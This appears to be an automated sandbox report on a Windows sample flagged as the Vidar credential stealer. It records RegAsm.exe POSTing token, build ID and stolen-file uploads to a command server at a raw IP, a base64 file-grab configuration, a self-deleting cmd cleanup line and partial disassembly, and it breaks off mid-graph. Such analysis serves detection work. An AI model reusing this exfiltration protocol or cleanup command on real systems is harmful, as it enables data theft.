                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HCFIJKKKKKFCAAAAFBKFCont
                                                                          2024-05-22 16:28:27 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:27 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.64972478.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:28 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 453
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:28 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------DAFIEHIEGDHIDGDGHDHJCont
                                                                          2024-05-22 16:28:29 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:28 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.64972578.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:30 UTC281OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBF
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 114541
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HDGDHCGCBKFHJKEBKFBFCont
                                                                          2024-05-22 16:28:30 UTC16355OUTData Raw: 6d 34 47 46 46 70 41 72 62 65 63 62 6e 64 66 79 35 71 58 56 68 6a 77 68 65 48 31 74 63 2f 2b 4f 69 6f 74 64 30 31 64 58 67 31 4b 77 61 55 78 43 61 33 74 78 76 43 35 78 69 52 7a 30 2f 43 72 4f 75 4a 35 66 68 53 39 6a 7a 6e 62 62 45 5a 39 63 4c 58 75 30 48 48 33 45 74 2b 62 2f 49 38 7a 47 4b 58 76 76 70 79 72 38 6a 78 79 69 69 69 76 74 6a 38 33 43 69 69 69 67 41 72 30 4c 34 61 2f 77 44 48 74 71 50 2b 2f 48 2f 4a 71 38 39 72 30 48 34 62 66 38 65 2b 70 66 37 30 66 38 6d 72 7a 4d 32 2f 33 5a 2b 71 50 59 79 4c 2f 66 46 36 4d 38 36 31 76 78 44 50 71 39 70 70 39 6e 79 6c 72 5a 57 38 63 53 52 35 2b 38 77 55 41 73 66 79 34 39 71 6c 38 50 61 34 39 6a 44 65 61 58 4e 4d 30 64 6a 66 78 6d 4e 32 42 2f 31 54 45 59 44 2f 41 45 37 48 31 46 62 66 2f 43 71 74 63 2f 35 2b 39
                                                                          Data Ascii: m4GFFpArbecbndfy5qXVhjwheH1tc/+Oiotd01dXg1KwaUxCa3txvC5xiRz0/CrOuJ5fhS9jznbbEZ9cLXu0HH3Et+b/I8zGKXvvpyr8jxyiiivtj83CiiigAr0L4a/wDHtqP+/H/Jq89r0H4bf8e+pf70f8mrzM2/3Z+qPYyL/fF6M861vxDPq9pp9nylrZW8cSR5+8wUAsfy49ql8Pa49jDeaXNM0djfxmN2B/1TEYD/AE7H1Fbf/Cqtc/5+9
                                                                          2024-05-22 16:28:30 UTC16355OUTData Raw: 79 4b 70 39 6a 53 4a 35 68 79 30 6f 69 44 48 47 52 46 47 71 4c 2b 43 71 41 42 2b 41 72 50 31 4c 53 35 4c 2b 4b 57 41 54 6d 4f 47 56 34 35 4a 46 41 47 53 79 5a 32 6e 4f 4d 6a 47 34 39 50 57 76 55 78 64 4f 72 55 6f 63 73 4e 4a 61 66 6e 71 65 4c 67 61 74 43 6a 69 65 61 70 72 48 55 64 64 36 78 39 6a 38 4b 50 49 74 6c 44 4a 71 73 4e 31 61 54 79 4c 4e 47 47 4b 72 4b 4a 43 73 52 42 7a 31 56 41 78 48 66 65 50 53 72 52 64 37 4c 78 5a 70 32 6c 77 32 30 4c 78 53 77 33 6c 31 76 75 2f 4b 5a 52 49 49 70 4d 52 45 6b 6c 63 52 4d 75 44 6b 67 62 67 53 52 6a 46 55 42 70 2b 70 4c 66 58 46 36 4e 53 33 33 4e 7a 63 70 64 54 53 53 78 4c 4a 76 6b 54 64 74 62 35 6c 4f 43 4e 78 78 6a 32 39 42 54 59 39 49 75 72 57 4b 4f 4b 31 76 64 71 70 4a 4c 4a 38 38 61 73 51 30 69 65 58 4a 67 6b
                                                                          Data Ascii: yKp9jSJ5hy0oiDHGRFGqL+CqAB+ArP1LS5L+KWATmOGV45JFAGSyZ2nOMjG49PWvUxdOrUocsNJafnqeLgatCjieaprHUdd6x9j8KPItlDJqsN1aTyLNGGKrKJCsRBz1VAxHfePSrRd7LxZp2lw20LxSw3l1vu/KZRIIpMREklcRMuDkgbgSRjFUBp+pLfXF6NS33NzcpdTSSxLJvkTdtb5lOCNxxj29BTY9IurWKOK1vdqpJLJ88asQ0ieXJgk
                                                                          2024-05-22 16:28:30 UTC16355OUTData Raw: 58 41 56 33 33 77 35 2f 31 4f 6f 2f 37 30 66 38 6d 72 7a 4d 32 2f 33 5a 2b 71 50 62 79 44 2f 66 46 36 4d 6d 75 66 45 30 50 68 76 77 46 70 55 76 79 76 64 79 32 55 53 77 52 48 75 64 67 35 50 73 50 2f 72 56 64 38 50 2b 4c 37 50 56 66 44 73 6d 6f 33 45 69 51 79 57 71 2f 77 43 6c 4c 2f 64 49 37 6a 32 50 62 38 71 38 55 76 64 51 75 64 51 61 45 33 45 6d 34 51 51 70 42 47 4f 79 6f 6f 77 41 4b 6c 30 6e 55 33 30 79 36 5a 73 46 37 65 5a 44 46 63 52 5a 2f 77 42 5a 47 65 6f 2b 76 63 48 73 51 4b 7a 6c 6c 55 48 54 66 38 31 37 2f 77 44 41 2f 72 71 65 72 44 4e 5a 71 6f 76 35 62 57 2f 34 50 39 64 44 33 43 35 75 34 4c 2b 58 77 2f 64 57 30 67 6b 68 6c 75 79 79 4d 4f 34 2b 7a 7a 56 77 66 6a 50 2f 41 4a 47 71 37 2b 6b 66 2f 6f 43 31 55 38 43 61 70 4d 50 45 46 6a 6f 77 6b 38 32
                                                                          Data Ascii: XAV33w5/1Oo/70f8mrzM2/3Z+qPbyD/fF6MmufE0PhvwFpUvyvdy2USwRHudg5PsP/rVd8P+L7PVfDsmo3EiQyWq/wClL/dI7j2Pb8q8UvdQudQaE3Em4QQpBGOyoowAKl0nU30y6ZsF7eZDFcRZ/wBZGeo+vcHsQKzllUHTf817/wDA/rqerDNZqov5bW/4P9dD3C5u4L+Xw/dW0gkhluyyMO4+zzVwfjP/AJGq7+kf/oC1U8CapMPEFjowk82
                                                                          2024-05-22 16:28:30 UTC16355OUTData Raw: 59 70 63 63 55 75 4b 58 46 4b 34 68 75 4b 4b 64 69 67 43 69 34 58 47 34 70 61 64 6a 48 61 6a 46 4b 34 58 45 41 71 31 59 44 2f 53 66 2b 32 62 35 2f 37 35 4e 56 38 56 61 73 68 2b 2f 50 2f 58 4e 2f 2f 51 54 57 64 54 34 57 53 32 63 46 4a 31 36 39 36 69 4a 39 65 4d 65 6c 53 79 48 35 6a 55 52 4e 65 6c 30 52 33 78 32 47 35 34 79 61 51 2f 68 53 6e 72 53 48 50 70 55 6c 6f 61 65 6c 4a 39 4b 58 76 53 47 6b 79 67 4e 49 61 55 6a 6a 48 36 30 68 36 31 49 78 4b 62 7a 69 6e 48 6b 66 6a 53 5a 77 63 30 68 69 48 6a 76 31 70 70 35 70 78 39 71 61 66 58 33 70 46 49 44 7a 53 48 33 37 55 74 4a 6e 69 67 59 64 65 31 4a 6a 33 35 6f 7a 6d 67 6e 33 70 41 42 4f 52 37 30 6c 4b 63 6d 6b 78 67 30 44 50 51 36 53 6c 6f 72 49 2b 53 45 70 61 4b 4b 41 45 6f 6f 6f 6f 47 46 46 46 46 49 41 6f 6f
                                                                          Data Ascii: YpccUuKXFK4huKKdigCi4XG4padjHajFK4XEAq1YD/Sf+2b5/75NV8Vash+/P/XN//QTWdT4WS2cFJ1696iJ9eMelSyH5jURNel0R3x2G54yaQ/hSnrSHPpUloaelJ9KXvSGkygNIaUjjH60h61IxKbzinHkfjSZwc0hiHjv1pp5px9qafX3pFIDzSH37UtJnigYde1Jj35ozmgn3pABOR70lKcmkxg0DPQ6SlorI+SEpaKKAEooooGFFFFIAoo
                                                                          2024-05-22 16:28:30 UTC16355OUTData Raw: 50 79 34 64 78 55 45 35 56 74 7a 48 61 54 67 59 41 34 35 35 34 76 77 42 46 44 2f 61 62 65 2b 6d 68 54 55 58 74 4a 72 32 33 4b 72 44 62 52 42 45 63 54 53 5a 51 67 44 45 6d 54 6c 6c 36 59 7a 58 48 58 78 65 46 6e 47 31 52 58 58 39 49 39 4c 43 35 64 6a 71 63 37 30 58 5a 32 37 39 4e 2f 78 73 62 50 2f 43 58 2b 49 50 38 41 6f 4a 4e 2f 33 35 6a 2f 41 50 69 61 50 2b 45 76 38 51 66 39 42 4a 76 2b 2f 4d 66 2f 41 4d 54 58 4a 4a 71 63 55 58 68 76 54 39 64 75 57 6c 2b 79 58 55 63 75 30 52 34 44 54 79 72 49 36 68 55 79 44 67 62 55 33 4d 53 44 6a 49 37 6b 43 74 57 7a 73 74 52 75 37 7a 54 56 6a 30 37 55 70 4c 4f 36 6a 74 58 65 35 53 32 59 71 50 4d 56 53 35 44 42 64 75 46 79 65 76 54 48 4e 59 52 6c 6c 37 66 77 6e 56 4f 6e 6e 45 4e 35 76 37 2f 6b 62 48 2f 43 58 2b 49 50 2b
                                                                          Data Ascii: Py4dxUE5VtzHaTgYA4554vwBFD/abe+mhTUXtJr23KrDbRBEcTSZQgDEmTll6YzXHXxeFnG1RXX9I9LC5djqc70XZ279N/xsbP/CX+IP8AoJN/35j/APiaP+Ev8Qf9BJv+/Mf/AMTXJJqcUXhvT9duWl+yXUcu0R4DTyrI6hUyDgbU3MSDjI7kCtWzstRu7zTVj07UpLO6jtXe5S2YqPMVS5DBduFyevTHNYRll7fwnVOnnEN5v7/kbH/CX+IP+
                                                                          2024-05-22 16:28:30 UTC16355OUTData Raw: 55 66 6e 70 6e 2b 4e 59 50 78 42 2f 77 43 52 69 68 2f 36 39 45 2f 39 44 65 76 53 36 38 30 2b 49 50 38 41 79 4d 55 50 2f 58 6f 6e 2f 6f 62 31 6a 67 4a 38 32 4b 68 6f 6c 76 38 41 6b 7a 6e 7a 6d 4e 73 42 55 31 37 66 6d 6a 6c 61 53 6c 6f 72 36 67 2b 43 45 2f 43 6a 6d 6c 6f 6f 43 34 6c 47 4b 57 6b 7a 54 41 57 6b 6f 70 4b 41 46 34 70 4b 4b 4b 51 77 6f 6f 6f 6f 43 77 55 6c 4c 53 47 67 41 6f 6f 6f 6f 41 4b 44 52 52 51 4d 53 69 69 69 67 41 70 4b 44 52 51 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 51 30 74 4a 51 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 47 4a 33 6f 70 61 53 67 41 6f 6f 70 4b 42 68 52 52 53 47 67 59 55 55 55 6c 43 41 4b 44 52 53 47 6d 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 47 49 61 4b 57 6b 6f 41 4b 53 6c 70 4b 42 68 53 55 47 69 67 61 43 6b 6f 4e 46 41 78 4b 4b 44 52
                                                                          Data Ascii: Ufnpn+NYPxB/wCRih/69E/9DevS680+IP8AyMUP/Xon/ob1jgJ82Kholv8AkznzmNsBU17fmjlaSlor6g+CE/CjmlooC4lGKWkzTAWkopKAF4pKKKQwooooCwUlLSGgAooooAKDRRQMSiiigApKDRQMKKKKAEooooAKQ0tJQMKKKKAEooooGJ3opaSgAoopKBhRRSGgYUUUlCAKDRSGmMKKKKAEooooGIaKWkoAKSlpKBhSUGigaCkoNFAxKKDR
                                                                          2024-05-22 16:28:30 UTC56OUTData Raw: 71 35 4a 2f 79 42 62 58 2f 72 34 6d 2f 77 44 51 59 36 41 50 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 2d 2d 0d 0a
                                                                          Data Ascii: q5J/yBbX/r4m/wDQY6AP/9k=------HDGDHCGCBKFHJKEBKFBF--
                                                                          2024-05-22 16:28:31 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:31 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.64972678.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:32 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----EBAEBFIIECBGCBGDHCAF
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------EBAEBFIIECBGCBGDHCAFContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------EBAEBFIIECBGCBGDHCAFCont
                                                                          2024-05-22 16:28:33 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:32 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.64972778.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:33 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----JDGIIDHJEBGIDHJJDBKE
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 331
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------JDGIIDHJEBGIDHJJDBKECont
                                                                          2024-05-22 16:28:34 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:34 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:12:27:53
                                                                          Start date:22/05/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x130000
                                                                          File size:364'032 bytes
                                                                          MD5 hash:F4FB6B518E2E550467F533124E1F80F4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:12:27:53
                                                                          Start date:22/05/2024
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0x880000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: HiddenCobra_BANKSHOT_Gen, Description: Detects Hidden Cobra BANKSHOT trojan, Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:12:28:35
                                                                          Start date:22/05/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:7
                                                                          Start time:12:28:35
                                                                          Start date:22/05/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:12:28:35
                                                                          Start date:22/05/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 10
                                                                          Imagebase:0xf30000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:3.5%
                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                            Signature Coverage:1.5%
                                                                            Total number of Nodes:1615
                                                                            Total number of Limit Nodes:14
                                                                            execution_graph 15108 13101f 15109 131028 15108->15109 15116 1324be 15109->15116 15111 131037 15122 132d6a 15111->15122 15117 1324ca __EH_prolog3 15116->15117 15118 134918 ctype 43 API calls 15117->15118 15119 1324ff 15118->15119 15121 132510 ctype 15119->15121 15129 133e12 15119->15129 15121->15111 15123 132d89 15122->15123 15125 13104b 15123->15125 15242 13931f 15123->15242 15126 134c8a 15125->15126 15249 134c5d 15126->15249 15130 133e1e __EH_prolog3 15129->15130 15141 133c2f 15130->15141 15135 133e3c 15153 133f98 15135->15153 15136 133e97 ctype 15136->15121 15140 133e5a 15163 133c87 15140->15163 15142 133c45 15141->15142 15143 133c3e 15141->15143 15145 133c43 15142->15145 15175 1344a2 EnterCriticalSection 15142->15175 15170 13a914 15143->15170 15145->15140 15147 133f75 15145->15147 15148 134918 ctype 43 API calls 15147->15148 15149 133f80 15148->15149 15150 133f94 15149->15150 15224 133ca6 15149->15224 15150->15135 15154 133e44 15153->15154 15155 133fa4 15153->15155 15157 133d6a 15154->15157 15227 134450 15155->15227 15158 133d78 15157->15158 15162 133da3 _Yarn 15157->15162 15159 133d84 15158->15159 15160 13a859 ___vcrt_freefls@4 14 API calls 15158->15160 15161 